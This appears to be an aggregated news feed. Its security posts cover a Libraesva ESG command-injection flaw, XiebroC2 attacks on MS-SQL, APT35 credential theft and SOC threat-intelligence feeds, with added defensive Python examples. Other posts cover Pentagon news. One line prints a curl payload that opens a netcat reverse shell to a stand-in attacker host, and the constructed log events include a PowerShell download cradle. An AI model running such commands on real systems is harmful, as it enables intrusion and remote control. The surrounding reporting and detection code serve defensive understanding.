• In late September 2025, the Cybersecurity and Infrastructure Security Agency (CISA) issued a public alert regarding the active exploitation of a critical command injection vulnerability tracked as CVE-2025-59689 in Libraesva Email Security Gateway (ESG) devices.

    This flaw has rapidly emerged as a favored target for threat actors due to its ease of exploitation and the wide deployment of Libraesva ESG as a frontline defense in corporate and government email infrastructure.

    The vulnerability allows unauthenticated attackers to execute arbitrary system commands on affected appliances, resulting in a significant risk of email compromise, data exfiltration, and lateral movement within networks.

    Initial discovery of this security weakness surfaced after multiple security firms observed anomalous traffic directed at public-facing ESG appliances across Europe and North America.

    Attackers quickly weaponized proof-of-concept exploits, taking advantage of the flaw’s simple payload delivery—typically through a crafted HTTP POST request to an exposed management interface.

    Organizations relying on Libraesva ESG appliances for spam and phishing defense are directly at risk, with exploitation frequently resulting in full device takeover.

    CISA analysts noted that attackers leveraging CVE-2025-59689 did so with high speed and stealth, leaving minimal traces in security logs.

    Their investigations revealed that successful exploitation permitted payloads enabling remote shell access, installation of additional malware packages, and use of the ESG appliance as a pivot point for internal reconnaissance.

    Notably, CISA documented several incidents where attackers deployed reverse shells to establish persistent access channels post-compromise.

    The infection mechanism at the heart of CVE-2025-59689 is a classic OS command injection. An attacker submits a specially crafted request to the web-based management API with command payloads embedded in user-supplied parameters.

    For example:

    curl -X POST "https://target-esg/management/api.php" -d 'cmd=;nc -e /bin/bash attacker[.]com 4444'

    This command illustrates how the flaw enables an external actor to spawn a remote shell directly to the attacker’s system, bypassing authentication controls.
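    The flaw class described above, reduced to a runnable pair: a request handler that splices a parameter into a shell string, beside a hardened handler that validates the value and never hands it to a shell. This is an added example and not Libraesva's code; the parameter, the helper names and the `echo` command are hypothetical stand-ins, and the appended command is an inert `echo INJECTED` rather than a reverse shell. `looks_like_injection` is the quick triage check a responder can run over request captures or web access logs for the `cmd=;nc -e ...` shape shown on the page.

```python
"""OS command injection (shell string built from a request parameter) beside a
hardened handler. Added example, not Libraesva code; all names are hypothetical
and the injected command is an inert 'echo' rather than a reverse shell."""
import re
import subprocess

# Allowlist for the one kind of value this parameter is meant to carry (a
# hostname): letters, digits, dots and hyphens. ';', '|', '`', '$(' never pass.
_HOSTNAME = re.compile(r"^[A-Za-z0-9.\-]{1,253}$")

# Metacharacters that turn one parameter value into several shell commands.
_SHELL_META = re.compile(r"[;&|`]|\$\(|\n")


def vulnerable_lookup(target: str) -> str:
    """Interpolates the raw parameter into a shell command line.

    With shell=True, /bin/sh parses the string, so 'host; echo INJECTED' runs
    two commands. The page's ';nc -e /bin/bash ...' payload is the same trick
    with a reverse shell as the second command.
    """
    completed = subprocess.run(
        f"echo resolving {target}", shell=True, capture_output=True, text=True
    )
    return completed.stdout


def hardened_lookup(target: str) -> str:
    """Validates against the allowlist, then passes the value as a single argv
    element with no shell involved, so it can only ever be data."""
    if not _HOSTNAME.match(target):
        raise ValueError(f"rejected parameter value: {target!r}")
    completed = subprocess.run(
        ["echo", "resolving", target], capture_output=True, text=True
    )
    return completed.stdout


def is_rejected(target: str) -> bool:
    """True when the hardened handler refuses the value."""
    try:
        hardened_lookup(target)
    except ValueError:
        return True
    return False


def second_command_ran(output: str) -> bool:
    """Did the attacker-appended command execute? The marker is on a line of
    its own only if 'echo INJECTED' ran as a separate command."""
    return "INJECTED" in output.splitlines()


def looks_like_injection(param_value: str) -> bool:
    """Triage helper for request captures or access logs: flags a parameter
    value that carries shell metacharacters (e.g. 'cmd=;nc -e ...')."""
    return bool(_SHELL_META.search(param_value))


if __name__ == "__main__":
    benign = "mail.example.org"
    payload = "mail.example.org; echo INJECTED"          # constructed payload
    print("vulnerable, benign :", vulnerable_lookup(benign).strip())
    print("vulnerable, payload:", " | ".join(vulnerable_lookup(payload).split()))
    print("hardened, benign   :", hardened_lookup(benign).strip())
    print("hardened, payload  : rejected =", is_rejected(payload))
    print("log triage         :", looks_like_injection(
        "cmd=;nc -e /bin/bash attacker.com 4444"))
```

    The allowlist does the real work: an argv list alone already prevents the shell from splitting the value, but rejecting anything outside the expected character set also stops the value from being abused by whatever program receives it.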

    CISA researchers found that many incidents occurred due to ESG appliances lacking recent security updates, underscoring the necessity for timely patching.

    The Libraesva ESG exploit flow begins with external payload delivery and culminates in command execution and attacker control.

    The continued exploitation of CVE-2025-59689 reinforces the importance of robust patch management and vigilant monitoring of security infrastructure for signs of compromise.


    The post CISA Warns of Libraesva ESG Command Injection Vulnerability Actively Exploited in Attacks appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated attack campaign targeting improperly managed Microsoft SQL servers has emerged, deploying the XiebroC2 command and control framework to establish persistent access to compromised systems.

    The attack leverages vulnerable credentials on publicly accessible database servers, allowing threat actors to gain initial foothold and escalate privileges through a multi-stage deployment process.

    XiebroC2, a publicly available C2 framework similar to CobaltStrike, provides attackers with comprehensive remote control capabilities including information gathering, defense evasion, and system manipulation.

    The campaign follows a predictable pattern observed in MS-SQL server attacks, beginning with credential-based intrusions and progressing to coin mining operations.

    However, the integration of XiebroC2 represents a significant escalation in attack sophistication, as the framework supports cross-platform operations across Windows, Linux, and macOS environments.

    The framework’s open-source nature and extensive feature set make it an attractive alternative to commercial penetration testing tools, offering attackers capabilities such as reverse shells, file management, process control, and network monitoring without the associated costs.

    ASEC analysts identified the malware during routine monitoring of attacks targeting MS-SQL servers, confirming the deployment of XiebroC2 alongside traditional coin mining payloads.

    The framework’s implant component, written in Go programming language, demonstrates advanced techniques for evading detection while maintaining persistent communication with command and control infrastructure.

    XiebroC2’s GitHub page (Source – ASEC)

    The attack methodology highlights the ongoing vulnerability of database servers that lack proper security hardening and access controls.

    Privilege Escalation Through JuicyPotato Exploitation

    The attack chain demonstrates a methodical approach to privilege escalation through the deployment of JuicyPotato, a well-documented exploit tool that abuses Windows token privileges.

    Following successful authentication to the target MS-SQL server, attackers encounter the inherent limitation of service account privileges, which typically operate with restricted access rights by design.

    To overcome this constraint, the threat actors use JuicyPotato to abuse the token privileges held by the account of the currently running process, elevating their access from service level to administrative permissions.

    The technique capitalizes on the impersonation privileges (SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege) routinely granted to service accounts, allowing the tool to spawn processes with elevated rights. Microsoft broke the original JuicyPotato technique in Windows 10 1809 and Server 2019, but its successors abuse the same privilege, so whether the SQL service account holds it remains the check that matters.

    Once JuicyPotato successfully escalates privileges, attackers proceed to download and execute the XiebroC2 framework using PowerShell commands.

    This approach ensures that subsequent malicious activities operate with sufficient privileges to modify system configurations, install additional payloads, and establish persistent backdoors.

    MS-SQL service downloading XiebroC2 (Source – ASEC)

    The configuration data reveals the framework’s ability to collect comprehensive system information including process identifiers, hardware identifiers, working directories, and user credentials before establishing encrypted communication channels with the command and control server located at IP address 1.94.185.235 on port 8433.


    The post Threat Actors Hijacking MS-SQL Server to Deploy XiebroC2 Framework appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A group of academics from KU Leuven and the University of Birmingham has demonstrated a new vulnerability called Battering RAM to bypass the latest defenses on Intel and AMD cloud processors. “We built a simple, $50 interposer that sits quietly in the memory path, behaving transparently during startup and passing all trust checks,” researchers Jesse De Meulemeester, David Oswald, Ingrid

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In recent months, a surge in targeted intrusions attributed to the Iranian-aligned threat group APT35 has set off alarm bells across government and military networks worldwide.

    First detected in early 2025, the campaign leverages custom-built malware to infiltrate secure perimeters and harvest user credentials.

    Initial indicators of compromise point to spear-phishing emails with HTML attachments that deploy a multi-stage payload once opened, silently establishing a foothold in the target environment.

    Analysis of the attack chain reveals that the initial vector often involves CVE-2023-23397, the Outlook vulnerability in which a crafted message item carrying a UNC path makes Outlook send the victim's NTLM credentials to an attacker-controlled server without user interaction, combined with weaponized Microsoft Office documents.

    The embedded code downloads a PowerShell stager, which then fetches the primary credential-stealer module from a remote command-and-control (C2) server.

    Stormshield researchers identified this behavior during a compromise of a defense ministry network in April, noting the seamless transition from document exploit to stealthy reconnaissance and credential exfiltration.

    Once deployed, the malware masquerades as legitimate system processes to evade detection. It hooks into the Windows Security Support Provider Interface (SSPI) to intercept NTLM challenge-response exchanges, capturing hashed credentials in memory.

    These captures are then relayed to the attacker's infrastructure. A captured NTLM challenge-response cannot itself be passed in a pass-the-hash logon; it is cracked offline to recover the password (or relayed while the session is live), and the resulting credentials are then used in pass-the-hash style lateral movement to unlock privileged accounts on high-value servers.

    The impact has been significant: multiple accounts within military communications networks were compromised without triggering conventional intrusion detection systems.

    In one documented case, the stager code resembles the following snippet, which shows how the malware reaches native Windows authentication APIs from PowerShell:

    $sspi = Add-Type -MemberDefinition @"
        // P/Invoke declaration for secur32!LsaLogonUser, the LSA entry point
        // that authenticates a user and returns a logon token.
        [DllImport("secur32.dll", CharSet=CharSet.Auto)]
        public static extern int LsaLogonUser(
            IntPtr LsaHandle, string OriginName, uint LogonType,
            uint LogonPackage, IntPtr AuthenticationInfo,
            uint AuthenticationInfoLength, IntPtr LocalGroups,
            IntPtr SourceContext, out IntPtr ProfileBuffer,
            out uint ProfileBufferLength, out uint LogonId,
            out IntPtr Token, out uint Quotas, out uint SubStatus);
    "@ -Name "Lsa" -Namespace "WinAPI" -PassThru

    Infection Mechanism

    The infection mechanism hinges on a two-stage downloader that first discerns the victim’s environment.

    Upon successful document exploit, the initial stager performs environment checks—querying registry keys for security tools and scanning loaded kernel modules.

    If a recognized analysis sandbox is detected, execution halts to thwart reverse-engineering efforts. Otherwise, the stager decodes a base64-encoded second-stage payload, writing it to %AppData%\Roaming\msnetcache.dll before loading it via rundll32.exe.

    Screenshot from viliam.ude-final[.]online (Source – Stormshield)

    This DLL implements the SSPI hook logic, intercepts credentials, and then performs HTTP GET requests to the C2 domain over port 443, blending traffic with legitimate HTTPS sessions.
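    Two of the execution chains on this page leave the same kind of endpoint-telemetry trail: the MS-SQL service spawning cmd.exe or PowerShell to fetch XiebroC2 (plus the C2 endpoint the ASEC write-up names), and rundll32.exe loading a DLL from a user's AppData tree as the APT35 stager does with msnetcache.dll. The checks below cover both and are an added example, not ASEC's, Stormshield's or any vendor's detection content. The events are constructed to resemble Sysmon process-creation (ID 1) and network-connection (ID 3) records with simplified field names; the paths and command lines are invented.

```python
"""Process-tree and network checks for the MS-SQL/XiebroC2 and APT35 chains.
Added example; the events are constructed Sysmon-like records, not real logs."""
import re

SQL_SERVICE = "sqlservr.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# C2 endpoint reported for the XiebroC2 campaign (taken from the article above).
XIEBROC2_C2 = ("1.94.185.235", 8433)
# A DLL argument under any user's AppData tree, e.g. ...\AppData\Roaming\msnetcache.dll
APPDATA_DLL = re.compile(r"\\appdata\\[^\s\"]*\.dll", re.IGNORECASE)


def image_name(path: str) -> str:
    """Last path component, lower-cased, so rules compare executable names."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Returns (rule, event_id) for every event a rule fires on."""
    hits = []
    for ev in events:
        if ev["kind"] == "process":
            parent, child = image_name(ev["parent_image"]), image_name(ev["image"])
            # The SQL service itself should not be launching shells; this is
            # what xp_cmdshell-style execution and the PowerShell download of
            # XiebroC2 look like in process telemetry.
            if parent == SQL_SERVICE and child in SHELLS:
                hits.append(("mssql-service-spawns-shell", ev["id"]))
            # rundll32 loading code from a user-writable profile directory,
            # the APT35 second stage's loading method.
            if child == "rundll32.exe" and APPDATA_DLL.search(ev["command_line"]):
                hits.append(("rundll32-loads-appdata-dll", ev["id"]))
        elif ev["kind"] == "network":
            if (ev["dst_ip"], int(ev["dst_port"])) == XIEBROC2_C2:
                hits.append(("xiebroc2-c2-endpoint", ev["id"]))
    return hits


SQL_BINN = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn"
EVENTS = [  # constructed
    {"id": 1, "kind": "process",
     "parent_image": SQL_BINN + r"\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": 'cmd.exe /c powershell -nop -w hidden -c '
                     '"(New-Object Net.WebClient).DownloadFile('
                     "'http://example.invalid/agent.exe','C:\\Temp\\agent.exe')\""},
    {"id": 2, "kind": "process",                      # benign: dump helper
     "parent_image": SQL_BINN + r"\sqlservr.exe",
     "image": SQL_BINN + r"\SQLDumper.exe",
     "command_line": "SQLDumper.exe 1234 0 0x0120"},
    {"id": 3, "kind": "network",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dst_ip": "1.94.185.235", "dst_port": 8433},
    {"id": 4, "kind": "process",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Users\jdoe\AppData\Roaming\msnetcache.dll,Start"},
    {"id": 5, "kind": "process",                      # benign: system DLL
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for rule, event_id in detect(EVENTS):
        print(f"{rule:32s} event {event_id}")
```

    For the privilege-escalation step in the MS-SQL chain, the prerequisite is visible before any exploit runs: `whoami /priv` in the context of the SQL service account (for example through xp_cmdshell on a test instance) lists SeImpersonatePrivilege if the potato family of tools can work, and `SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'` shows whether command execution from SQL is enabled at all.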

    Overall, the campaign reflects APT35’s growing sophistication in embedding deep within trusted processes and leveraging native APIs to capture credentials without dropping overt artifacts.

    Continued vigilance and advanced behavioral monitoring are crucial to detect such stealthy intrusions before critical access is compromised.


    The post APT35 Hackers Attacking Government, Military Organizations to Steal Login Credentials appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Defense Secretary Pete Hegseth summoned hundreds of admirals, generals, and senior enlisted leaders to Quantico, Virginia, on Tuesday to hear him announce a spate of personnel initiatives around physical fitness and grooming standards, the inspector general process, and mandatory training.

    Some of the 10 initiatives flow from reviews Hegseth has ordered since taking the job in January, including gender-neutral fitness standards for combat jobs and exemptions to facial hair rules. Others take aim at processes that affect or have affected the secretary himself.

    “I don't want my son serving alongside troops who are out of shape, or in a combat unit with females who can't meet the same combat arms physical standards as men, or troops who are not fully proficient on their assigned weapons platform or task, or under a leader who is the first, but not the best,” he told the assembled flag officers and their enlisted advisors, who were ordered to Marine Corps Base Quantico on short notice from commands around the world. 

    Hegseth’s speech functioned as a sort of State of the Union for his culture war at the Pentagon, making baseless claims that fitness standards have dropped to accommodate the integration of women, or that the first women or people of color to hold high-ranking positions were chosen for that reason alone. 

    He called for a review of the inspector general process, including the Equal Opportunity and Military Equal Opportunity complaint processes, which enable troops to anonymously report concerns without fear of retaliation.

    “We are overhauling an inspector general process, the IG, that has been weaponized, putting complainers, ideologues, and poor performers in the driver's seat,” he said.

    Hegseth is under investigation by the department’s inspector general for allegedly using an unsecure, unapproved app to conduct official business in the form of sending strike plans over Signal.

    He also called for a review of the rules governing the retention of “adverse information”—for example, documented misconduct—on personnel records, which can hamstring a service member’s assignment or promotion chances.

    “People make honest mistakes, and our mistakes should not define an entire career,” he said.

    Hegseth has said he resigned from the D.C. National Guard in 2021 after his superiors concluded that his tattoos were associated with white supremacist ideology and barred him from serving at Biden inaugural events.

    Here are the initiatives Hegseth announced Tuesday:

    • All combat arms positions will use the “highest male standard” as their physical fitness requirement.
    • All combat arms units will implement a separate “combat field test.”
    • All service members will take part in physical fitness every duty day, whether as a unit or individually.
    • All service members must complete a height-weight assessment and physical fitness test twice yearly. (This is already policy.) 
    • Beards are banned, except for temporary waivers for pseudofolliculitis barbae. Religious exemptions, such as those for Norse Pagans or Sikhs, are rescinded.
    • The department will review its definitions of “toxic leadership,” hazing, and bullying.
    • A department-wide review of fitness standards.
    • A review of the IG, EO, and MEO processes.
    • Unspecified changes to retention of adverse information in personnel files.
    • Reduction of mandatory training requirements

    “I look out at this group, and I see great Americans, leaders who have given decades to our great Republic, at great sacrifice to yourselves and to your families,” Hegseth said, addressing the assembled senior leaders. “But if the words today are making your heart sink, then you should do the honorable thing and resign.”

    Some of Hegseth’s comments on physical fitness standards, including repeatedly referring to “fat” service members, reinforce policies that already exist but may be unevenly enforced. As an example, members of the military regularly question whether four-star generals and admirals are truly completing their fitness assessments.

    “Frankly, it's tiring to look out at combat formations, or really, any formation, and see fat troops,” the secretary said. “Likewise, it's completely unacceptable to see fat generals and admirals in the halls of the Pentagon and leading commands around the country and the world. It's a bad look.”

    Other comments were flat-out fabrications, such as his assertion that in 2015, “combat arms standards were changed to ensure females could qualify.”

    No service has lowered its fitness standards to accommodate women. In one case, the Army created an entirely new battery – the Occupational Physical Assessment Test – with gender-neutral scoring to determine which types of jobs new recruits are qualified to do. The service then spent years revamping its fitness test, adding events that test strength, power and agility in addition to muscular endurance.

    Hegseth’s review requires a justification for any standards put in place after 1990, suggesting that he prefers a default to that era’s gender- and age-determined scoring of pushups, situps and a run.

    Throughout the secretary’s many public comments alleging lowered fitness standards, he has not specified an instance where it happened. 

    Hegseth also called on the assembled leaders to be honest about the state of the force.

    “We have to say with our mouths what we see with our eyes, just tell it like it is in plain English to point out the obvious things right in front of us,” he said. “That's what leaders must do.”

    That comment came just a month after Hegseth fired Air Force Lt. Gen. Jeffrey Kruse, the director of the Defense Intelligence Agency, whose initial assessments of the bombing of Iran nuclear sites determined that the raid had set back the country’s nuclear ambitions by months, rather than the “obliteration” the administration touted.

    The department dropped another memo Tuesday, which Hegseth did not mention in his speech, directing a “cultural refresh” among the civilian workforce, “to address two complementary but distinct objectives: encourage workforce rewards and demystify the removal process.”

    More than 60,000 civilians voluntarily left DOD this year either through the Deferred Resignation Program or Voluntary Early Retirement Authority, in addition to hundreds of probationary employees the Pentagon attempted to lay off and then invited back under a judge’s order.  

    Hegseth previewed another speech next month, saying he’ll “showcase the speed, innovation and generational acquisition reforms we are undertaking urgently,” and “the nature of the threats we face in our hemisphere and in deterring China.”


    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Security Operations Centers (SOCs) protect organizations’ digital assets from ongoing cyber threats. To assess their effectiveness, SOCs use key performance indicators (KPIs) such as Mean Time to Detect (MTTD) and False Positive Rate (FPR).

    Although these metrics are often seen as separate, they are closely interconnected; improving one can directly enhance the other.

    By integrating high-fidelity threat intelligence (TI) feeds, SOC teams can significantly lower their MTTD, which in turn helps to drastically reduce the number of false positives that plague their daily operations.

    A false positive occurs when a security tool mistakenly flags harmless activity as malicious. A high FPR is one of the most significant challenges facing modern SOCs. It leads to several detrimental outcomes:

    • Alert Fatigue: Analysts become overwhelmed by a constant stream of irrelevant alerts, leading to burnout and desensitization. This environment makes it more likely that a genuine threat will be overlooked.
    • Wasted Resources: Every false positive requires investigation time from a security analyst, typically at the Tier 1 level. These cycles are costly and divert attention from legitimate threats and proactive threat-hunting activities.
    • Reduced Trust in Security Tools: When a particular security system generates too much noise, analysts may begin to distrust its alerts, lowering their overall confidence in the organization’s security posture.

    How Threat Intelligence Feeds Reduce MTTD

    Mean Time to Detect measures the average time it takes for the SOC to become aware of a security incident. A lower MTTD is crucial because it shortens the window an attacker has to operate within the network.


    Threat intelligence feeds are real-time streams of Indicators of Compromise (IOCs) such as malicious IP addresses, domains, URLs, and file hashes that are directly integrated into security tools like SIEM, SOAR, and EDR platforms.

    This integration enables the automated, real-time correlation of internal network and endpoint data with a global repository of known threats. When a match occurs, an alert is generated with a high degree of confidence.

    This process reduces detection time from hours or days of manual investigation to seconds. Using TI feeds to lower MTTD also contributes to a reduced false positive rate through several mechanisms; the key lies in the quality and context of the intelligence provided.

    High-quality TI feeds are curated from verified sources, such as interactive sandbox analysis of real-world malware samples. This means the IOCs within the feed have already been vetted and are confirmed to be malicious.

    When a security tool raises an alert on a match from a high-fidelity feed, the alert is very likely a true positive, provided the indicator is still current: IP addresses get reassigned and domains get sinkholed, so the feed must expire or down-weight entries that have not been seen active recently. With that caveat, such matches filter out the ambiguous, low-confidence alerts that would otherwise require manual triage.

    Modern TI feeds do more than just provide a list of IOCs. They enrich alerts with critical context that helps analysts immediately understand the nature and severity of the threat. This context includes:

    • Threat Categorization: The alert is labeled with the associated malware family (e.g., Dridex, Emotet) or threat actor group.
    • Severity Score: A numerical score indicates the risk level of the IOC, allowing for automated prioritization.
    • Timestamps: Information on when the IOC was first and last seen helps determine if the threat is part of an active campaign.
    • Related Artifacts: Links to associated file hashes, domains, or URLs provide a more complete picture of the attack infrastructure.

    This contextual data transforms a generic alert like “Suspicious connection to IP 1.2.3.4” into a high-confidence, actionable insight: “Critical Alert: Outbound C2 communication to 1.2.3.4, confirmed part of active LockBit 3.0 ransomware infrastructure.” This removes ambiguity and confirms the alert’s legitimacy, preventing it from being dismissed as a false positive.
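    The correlation and enrichment just described, together with the two metrics the page measures it by, as an added example rather than any vendor's feed format or product. The feed records, egress log lines, timestamps and triage verdicts are constructed, and the addresses are documentation ranges, not real indicators. Besides producing the enriched alert text, the matcher skips indicators whose `last_seen` is older than a configurable window, which is the check that keeps a stale entry from turning a "high-fidelity" match into a false positive.

```python
"""Feed matching with context, indicator aging, MTTD and false-positive share.
Added example; feed, log lines and timestamps are constructed, not real data."""
from datetime import datetime
import re

FEED = [  # constructed IOC records carrying the context fields listed above
    {"ioc": "203.0.113.45", "family": "LockBit 3.0", "severity": 95,
     "first_seen": "2025-09-20T10:00:00", "last_seen": "2025-09-29T08:00:00"},
    {"ioc": "updates.example.net", "family": "Emotet", "severity": 80,
     "first_seen": "2025-03-02T00:00:00", "last_seen": "2025-04-10T12:00:00"},
    {"ioc": "198.51.100.7", "family": "Dridex", "severity": 70,
     "first_seen": "2025-09-28T00:00:00", "last_seen": "2025-09-30T01:00:00"},
]

# Constructed egress log lines: "<timestamp> <src> -> <dst>:<port>".
LOG_LINES = [
    "2025-09-30T09:15:02 10.0.0.5 -> 203.0.113.45:443",
    "2025-09-30T09:16:10 10.0.0.7 -> updates.example.net:80",
    "2025-09-30T09:17:00 10.0.0.9 -> 93.184.216.34:443",
    "2025-09-30T09:18:45 10.0.0.5 -> 198.51.100.7:8443",
]
_LINE = re.compile(r"^(\S+) (\S+) -> ([^:\s]+):(\d+)$")


def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


def match_feed(lines, feed, now: str, max_age_days: int = 30):
    """Correlate egress logs with the feed and emit enriched alerts.

    Indicators not seen active within max_age_days are dropped first: a
    once-malicious IP may have been reassigned and a domain sinkholed, which
    is how a confident-looking match still turns out to be noise."""
    now_dt = _ts(now)
    index = {}
    for rec in feed:
        age_days = (now_dt - _ts(rec["last_seen"])).days
        if age_days <= max_age_days:
            index[rec["ioc"]] = (rec, age_days)
    alerts = []
    for line in lines:
        m = _LINE.match(line)
        if not m:
            continue                      # unparseable line, leave for the parser owner
        ts, src, dst, port = m.groups()
        if dst not in index:
            continue
        rec, age_days = index[dst]
        alerts.append({
            "time": ts, "src": src, "ioc": dst, "port": int(port),
            "family": rec["family"], "severity": rec["severity"],
            "message": (f"Outbound connection from {src} to {dst}:{port}, "
                        f"{rec['family']} infrastructure (severity "
                        f"{rec['severity']}, last seen {age_days} days ago)"),
        })
    return alerts


def mttd_seconds(incidents) -> float:
    """Mean Time to Detect over (compromise_time, detection_time) pairs."""
    deltas = [(_ts(detected) - _ts(compromised)).total_seconds()
              for compromised, detected in incidents]
    return sum(deltas) / len(deltas)


def false_positive_share(verdicts) -> float:
    """Fraction of triaged alerts closed as false positive. SOC reporting
    usually means this alert-level share by 'FPR', not FP/(FP+TN)."""
    return sum(1 for v in verdicts if v == "fp") / len(verdicts)


if __name__ == "__main__":
    for alert in match_feed(LOG_LINES, FEED, now="2025-09-30T12:00:00"):
        print(alert["message"])
    print("MTTD (s):", mttd_seconds([("2025-09-30T09:00:00", "2025-09-30T09:15:02"),
                                     ("2025-09-30T08:30:00", "2025-09-30T08:35:00")]))
    print("FP share:", false_positive_share(["tp", "fp", "tp", "tp"]))
```

    The stale Emotet domain produces no alert even though the log shows a connection to it; tracking how often the aging rule suppresses a match is itself a useful feed-quality signal, and a sudden rise in suppressed matches usually means the feed has stopped refreshing rather than that the threat has gone away.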

    With the immediate validation and context provided by TI feeds, SOCs can automate the initial triage process. Using SOAR (Security Orchestration, Automation, and Response) playbooks, alerts enriched by high-confidence threat intelligence can trigger automated actions.

    For example, a confirmed malicious IP can be automatically added to a firewall blocklist, and the affected endpoint can be isolated from the network.

    This not only reduces the Mean Time to Respond (MTTR) but also ensures that analyst time is reserved for complex incidents that require human ingenuity rather than validating known threats.

    Threat intelligence feeds also empower Tier 2 and Tier 3 analysts to conduct more effective proactive threat hunting. By providing IOCs and Tactics, Techniques, and Procedures (TTPs) associated with emerging campaigns, feeds allow hunters to build hypotheses and search for threats before they trigger automated alerts.

    For instance, if a feed highlights a new TTP used by a specific threat actor, hunters can search their environment for evidence of that behavior.

    This proactive posture uncovers stealthy threats that might otherwise go undetected and further validates the intelligence being used, reinforcing the cycle of high-confidence detections.


    The post How SOC Teams Detect Can Detect Cyber Threats Quickly Using Threat Intelligence Feeds appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The nation’s top spy offices are expected to pare certain "non-essential" intelligence-gathering activities if the government shuts down at midnight tonight.

    Under guidance provided by the Defense Department, intelligence work that directly supports active military operations, threat monitoring, or other national-security emergencies is designated “excepted” and would continue if funding lapses.

    But agencies would be required to pause certain longer-term activities. Those include political and economic analysis work unrelated to current crises and intelligence support for weapons acquisition. 

    Political and economic assessments can help military planners understand how foreign governments and global financial conditions shape conflicts, while weapons-acquisition intelligence helps the U.S. design, purchase, and test systems.

    In essence, tactical intelligence collection activities would remain active, though much of the strategic analysis that supports future planning of the DOD’s spying activities would be curtailed until federal funding is restored.

    “Command, control, communications, computer, intelligence, surveillance and reconnaissance activities” remain excepted functions, the document says. That also includes the use of spying capabilities tied to telecommunications infrastructure, which are often used by the National Security Agency to intercept phone calls and other communications as they cross the world’s internet backbone.

    Offices like the National Geospatial-Intelligence Agency, which relies on satellites and imagery analysis to track targets from space, can also continue their core intelligence missions. Other major DOD spying offices include the Defense Intelligence Agency and the National Reconnaissance Office, the latter of which designs and launches the nation’s spy satellites.

    The exemptions would also apply to a slew of other intelligence units housed inside military branches like the Army, Air Force and Navy. 

    Other intelligence offices like the CIA are not housed directly in DOD but coordinate closely with the military on spying matters. Less public information is available on shutdown plans for the CIA and the Office of the Director of National Intelligence, which oversees the nation’s 18 spy agencies.


    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Government and telecommunications organizations across Africa, the Middle East, and Asia have emerged as the target of a previously undocumented China-aligned nation-state actor dubbed Phantom Taurus over the past two-and-a-half years. “Phantom Taurus’ main focus areas include ministries of foreign affairs, embassies, geopolitical events, and military operations,” Palo Alto Networks Unit 42

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Grooming standards, “toxic leadership,” and culture wars were the themes Defense Secretary Pete Hegseth chose for his unprecedented short-notice gathering of more than 800 military leaders and their senior enlisted advisors from commands around the world to a Marine base in Virginia Tuesday morning. 

    Shortly before Hegseth spoke, President Donald Trump told reporters the generals and admirals had come to hear “how well we’re doing militarily.” But Hegseth spent most of his time repeating many of the gripes heard during Trump’s presidential campaign. 

    “No more dudes in dresses. No more climate change worship,” Hegseth said in his Tuesday address. “We are done with that shit,” he insisted. “For too long we've promoted too many uniformed leaders for the wrong reasons—based on their race, gender quotas, based on historic so-called ‘firsts,’” said Hegseth, who has fired black and women leaders while offering no evidence that they were inappropriately appointed or had performed poorly. 

    Here are a few other lines from Hegseth’s speech to the highest-ranking members of the U.S. military: 

    • On names: “Welcome to the War Department. Because the era of the Department of Defense is over.”
    • On accountability: “We are overhauling an inspector general process that has been weaponized, putting complainers and poor performers in the driver seat. We are doing the same with the equal opportunity policies. No more frivolous complaints, no more anonymous complaints,” he said, which would seem to protect domestic abusers in the Pentagon’s ranks. 
    • More on accountability: “You should not pay for an earnest mistake for your entire career. That's why today, at my direction, we're making changes to the retention of adverse information on personnel records.” He also said he’s ordered a review of “the department’s definitions of so-called toxic leadership, bullying and hazing to empower leaders to enforce standards without fear of retribution or second guessing.”
    • On fitness: “I don't want my son serving alongside troops who are out of shape or in combat units with females who can't meet the same combat arms physical standards as men.”
    • More on fitness: “Frankly, it's tiring to look out at combat formations and see fat troops. Likewise, it's completely unacceptable to see fat generals and admirals.”
    • On beards: “The era of unprofessional appearance is over. No more beardos…if you don't meet the male-level physical standards for combat positions, cannot pass a PT test or don't want to shave and look professional, it's time for a new position.”
    • On drill sergeants: “We're empowering drill sergeants to instill healthy fear in new recruits, ensuring that future warfighters are forged…they can put hands on recruits.”
    • On ethics in conflict: “We untie the hands of our warfighters to intimidate, demoralize, hunt, and kill the enemies of our country. No more politically correct and overbearing rules of engagement.”
    • On Hegseth’s view of the military: “You kill people and break things for a living. You are not politically correct.”

    President Trump took the podium after Hegseth, and told the crowd, “I've never walked into a room so silent before. Just have a good time. And if you want to applaud, you applaud.”

    He added: “If you don't like what I'm saying, you can leave the room. Of course, there goes your rank. There goes your future. But you just feel nice and loose,” the president told his captive audience. 

